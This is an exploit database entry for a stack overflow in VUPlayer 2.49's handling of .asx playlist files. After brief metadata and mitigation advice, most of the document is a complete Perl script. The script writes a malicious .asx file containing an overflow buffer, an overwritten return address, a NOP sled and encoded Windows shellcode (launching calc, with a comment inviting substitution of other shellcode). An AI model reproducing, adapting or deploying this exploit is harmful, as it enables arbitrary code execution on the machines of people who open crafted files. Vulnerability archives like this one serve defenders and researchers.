VUPlayer 2.49 (.asx File) local Stack Overflow Exploit

vendor:
VUPlayer
by:
Houssamix
9.8
CVSS
CRITICAL
Stack Overflow
CWE
Product Name: VUPlayer
Affected Version From: 2.49
Affected Version To: 2.49
Patch Exists: NO
Related CWE:
CPE: a:vuplayer:vuplayer:2.49
Metasploit:
Other Scripts:
Platforms Tested: Windows
VUPlayer 2.49 (.asx File) local Stack Overflow Exploit

This exploit targets VUPlayer version 2.49 and utilizes a stack overflow vulnerability in the handling of .asx files. By crafting a malicious .asx file, an attacker can trigger a stack overflow, potentially allowing for the execution of arbitrary code.
Mitigation:

Upgrade to a patched version of VUPlayer.
Source
Exploit-DB raw data:

#!/usr/bin/perl -w


# author : Houssamix

# VUPlayer 2.49 (.asx File) local Stack Overflow Exploit

print "
########################################################################
#~ Author   : HouSSamix                                                #
#~ Program  : VUPlayer                                                 #
#~ Version  : 2.49                                                     #
#~ website  : http://www.vuplayer.com/                                 #
#~ Download : http://vuplayer.com/files/vuplayersetup.exe              #
#~ Type     : (.asx File) local Stack Overflow Exploit                 #
########################################################################\n";
###################################################################
$BOF =
"\x3C\x41\x53\x58\x20\x56\x45\x52\x53\x49\x4F\x4E\x3D\x22\x33\x2E".
"\x30\x22\x3E\x0A\x0D\x0A\x3C\x45\x4E\x54\x52\x59\x3E\x0A\x3C\x54".
"\x49\x54\x4C\x45\x3E\x50\x72\x4F\x20\x53\x70\x59\x3C\x2F\x54\x49".
"\x54\x4C\x45\x3E\x0A\x0D\x0A\x3C\x52\x45\x46\x20\x48\x52\x45\x46".
"\x3D\x22\x6D\x51\x47\x69\x42\x45\x67\x30\x33\x70\x55\x52\x42\x41".
"\x44\x55\x56\x77\x4A\x75\x4B\x53\x51\x2B\x73\x4D\x45\x6C\x34\x78".
"\x43\x5A\x75\x77\x42\x75\x6A\x53\x53\x58\x4A\x69\x30\x62\x46\x6B".
"\x32\x31\x49\x34\x66\x75\x30\x69\x70\x64\x56\x34\x68\x41\x31\x32".
"\x45\x49\x4F\x6D\x34\x69\x41\x34\x30\x70\x48\x39\x72\x50\x69\x43".
"\x48\x6B\x65\x41\x52\x71\x50\x75\x6A\x4F\x71\x6C\x78\x63\x4D\x6E".
"\x52\x51\x68\x39\x62\x43\x32\x2B\x75\x53\x34\x4D\x54\x67\x63\x2B".
"\x46\x38\x52\x33\x62\x62\x51\x56\x65\x61\x57\x36\x6E\x38\x6C\x5A".
"\x2B\x48\x51\x59\x57\x5A\x4D\x77\x57\x41\x72\x30\x31\x4C\x61\x5A".
"\x38\x64\x64\x57\x37\x38\x59\x69\x58\x45\x49\x75\x5A\x47\x71\x72".
"\x62\x37\x69\x6D\x62\x57\x79\x6B\x4B\x70\x45\x68\x52\x34\x41\x71".
"\x73\x78\x6C\x6F\x6D\x73\x5A\x74\x37\x73\x33\x77\x43\x67\x6A\x72".
"\x69\x47\x75\x62\x48\x78\x5A\x79\x37\x70\x75\x63\x6A\x63\x36\x37".
"\x77\x52\x43\x79\x5A\x31\x4A\x66\x6B\x44\x2F\x33\x55\x4D\x53\x48".
"\x2F\x53\x32\x4B\x35\x68\x79\x62\x34\x33\x38\x4E\x32\x4E\x43\x4B".
"\x7A\x79\x74\x61\x79\x4E\x69\x52\x50\x63\x65\x57\x4B\x50\x6D\x4F".
"\x73\x2F\x4D\x51\x6F\x38\x75\x55\x5A\x35\x43\x52\x2B\x35\x54\x34".
"\x55\x51\x59\x75\x2B\x53\x4D\x62\x75\x69\x75\x6D\x31\x78\x78\x48".
"\x64\x47\x62\x54\x33\x5A\x6F\x63\x63\x6E\x61\x4C\x65\x72\x77\x41".
"\x36\x38\x56\x52\x30\x55\x50\x4E\x76\x62\x66\x64\x45\x64\x74\x44".
"\x43\x4F\x4A\x49\x51\x44\x4A\x66\x72\x34\x45\x6F\x56\x77\x6E\x6F".
"\x49\x45\x43\x57\x73\x57\x38\x37\x6F\x59\x41\x61\x36\x72\x4D\x38".
"\x65\x46\x53\x70\x6C\x42\x63\x6F\x4E\x68\x74\x34\x6D\x4E\x74\x54".
"\x35\x74\x6B\x66\x41\x64\x47\x6D\x66\x66\x54\x4F\x52\x73\x4B\x54".
"\x65\x54\x71\x68\x79\x71\x41\x2F\x30\x57\x39\x49\x79\x41\x70\x4A".
"\x34\x6B\x6A\x4C\x53\x4C\x32\x7A\x31\x4B\x4B\x67\x33\x67\x31\x6C".
"\x65\x63\x58\x66\x7A\x6F\x55\x32\x43\x68\x34\x66\x76\x68\x31\x54".
"\x44\x6D\x68\x34\x57\x39\x69\x37\x42\x72\x6B\x38\x70\x61\x2B\x38".
"\x32\x79\x49\x57\x38\x79\x44\x34\x56\x78\x30\x37\x4C\x57\x49\x39".
"\x4D\x32\x5A\x59\x56\x2F\x63\x68\x72\x48\x35\x4D\x66\x56\x4D\x47".
"\x62\x6C\x56\x4D\x73\x32\x53\x61\x51\x63\x47\x41\x6E\x67\x51\x72".
"\x71\x35\x43\x38\x5A\x6B\x31\x68\x79\x65\x44\x70\x36\x54\x75\x46".
"\x56\x39\x55\x47\x4B\x59\x73\x6F\x65\x4C\x6B\x38\x53\x71\x39\x6F".
"\x58\x63\x5A\x4F\x4C\x42\x50\x70\x67\x4B\x31\x6F\x4E\x35\x63\x65".
"\x47\x77\x38\x30\x70\x31\x4B\x4C\x4C\x4D\x33\x57\x47\x73\x55\x6E".
"\x36\x64\x6E\x62\x51\x63\x62\x57\x6C\x73\x64\x7A\x42\x79\x62\x53".
"\x41\x38\x63\x33\x56\x69\x62\x57\x6C\x30\x51\x47\x31\x70\x62\x48".
"\x63\x77\x63\x6D\x30\x75\x59\x32\x39\x74\x50\x6F\x68\x67\x42\x42".
"\x4D\x52\x41\x67\x41\x67\x42\x51\x4A\x49\x4E\x4E\x36\x56\x41\x68".
"\x73\x44\x42\x67\x73\x4A\x43\x41\x63\x44\x41\x67\x51\x56\x41\x67".
"\x67\x44\x42\x42\x59\x43\x41\x77\x45\x43\x48\x67\x45\x43\x46\x34".
"\x41\x41\x43\x67\x6B\x51\x6E\x55\x35\x2B\x76\x33\x57\x47\x38\x6F".
"\x59\x79\x7A\x67\x43\x5A\x41\x57\x74\x55\x68\x4D\x6C\x76\x7A\x78".
"\x35\x43\x6A\x74\x55\x79\x41\x42\x2F\x72\x6D\x69\x4B\x63\x6F\x2F".
"\x41\x41\x6E\x41\x39\x48\x63\x46\x6D\x6C\x39\x37\x36\x65\x5A\x64".
"\x56\x64\x62\x5A\x6F\x75\x35\x44\x6E\x58\x6D\x79\x2F\x47\x75\x51".
"\x51\x4E\x42\x45\x67\x30\x33\x77\x38\x51\x45\x41\x43\x43\x35\x47".
"\x54\x34\x30\x73\x76\x7A\x5A\x59\x4A\x4B\x59\x6D\x39\x64\x51\x46".
"\x6E\x76\x75\x54\x6B\x56\x68\x52\x72\x79\x50\x73\x65\x4A\x76\x33".
"\x58\x6D\x44\x67\x52\x42\x42\x70\x64\x45\x74\x63\x74\x33\x79\x50".
"\x35\x63\x4F\x61\x47\x31\x41\x6E\x62\x56\x32\x6D\x32\x79\x50\x79".
"\x6C\x6C\x6E\x78\x4A\x41\x61\x74\x7A\x52\x6C\x70\x58\x59\x73\x32".
"\x61\x2B\x6C\x32\x37\x41\x64\x32\x65\x46\x6F\x4C\x6C\x45\x68\x31".
"\x39\x38\x6D\x6A\x56\x50\x75\x66\x59\x4C\x62\x6B\x71\x35\x42\x74".
"\x33\x53\x39\x41\x2B\x46\x36\x69\x58\x68\x51\x72\x2B\x4A\x54\x58".
"\x4D\x41\x54\x50\x44\x48\x67\x34\x43\x2F\x39\x71\x66\x79\x52\x62".
"\x63\x55\x68\x70\x35\x57\x61\x61\x4E\x5A\x42\x6D\x51\x49\x31\x32".
"\x34\x6F\x6D\x4E\x5A\x5A\x54\x4C\x56\x4C\x34\x72\x49\x62\x4C\x73".
"\x56\x49\x77\x33\x77\x79\x4C\x31\x5A\x44\x71\x4D\x38\x72\x72\x73".
"\x54\x51\x41\x57\x72\x61\x47\x35\x6A\x79\x73\x37\x5A\x37\x65\x69".
"\x78\x49\x6B\x64\x64\x58\x37\x36\x73\x6D\x6E\x4D\x78\x53\x56\x67".
"\x50\x6A\x63\x77\x5A\x6B\x49\x43\x37\x49\x2F\x2B\x2F\x41\x4C\x61".
"\x4C\x69\x4F\x41\x74\x31";
$ECX = "\x43\x43\x43\x43";
$nops = "\x33\x33\x33\x37\x34\x6D\x49\x4D\x4F\x70\x4E\x42";
$EIP = "\x5D\x38\x82\x7C" ; # EIP

$c =	"\x90" x 36 ; 



# u can change this shellcode but dont forget to use Encoder=PexAlphaNum

# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37".
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x58".
"\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x53\x4b\x38".
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x33\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58".
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x54".
"\x4b\x38\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x4b\x48\x4e\x51\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x55\x46\x32\x46\x50\x43\x4c\x41\x43".
"\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x53\x45\x58\x42\x4c\x4a\x57".
"\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
"\x4b\x38\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x58\x42\x4b".
"\x42\x30\x42\x30\x42\x30\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x43".
"\x48\x4f\x42\x46\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x47".
"\x42\x35\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x36".
"\x4e\x56\x43\x36\x42\x50\x5a";

$cc =	"\x90" x 7687 ; 

$asx =  "\x2E\x61\x73\x66\x22\x2F\x3E\x0A\x3C\x2F\x45\x4E\x54\x52\x59\x3E".
        "\x0A\x3C\x2F\x41\x53\x58\x3E\x0A";

$file="houssamix.asx";
open($FILE, ">$file");
$exp = $BOF.$ECX.$nops.$EIP.$c.$shellcode.$cc.$asx;
print $FILE $exp;
close($FILE);

print "
################################
File exploit created open it with vuplayer
################################
Exploit by Houssamix
\n\n";

# milw0rm.com [2009-01-09]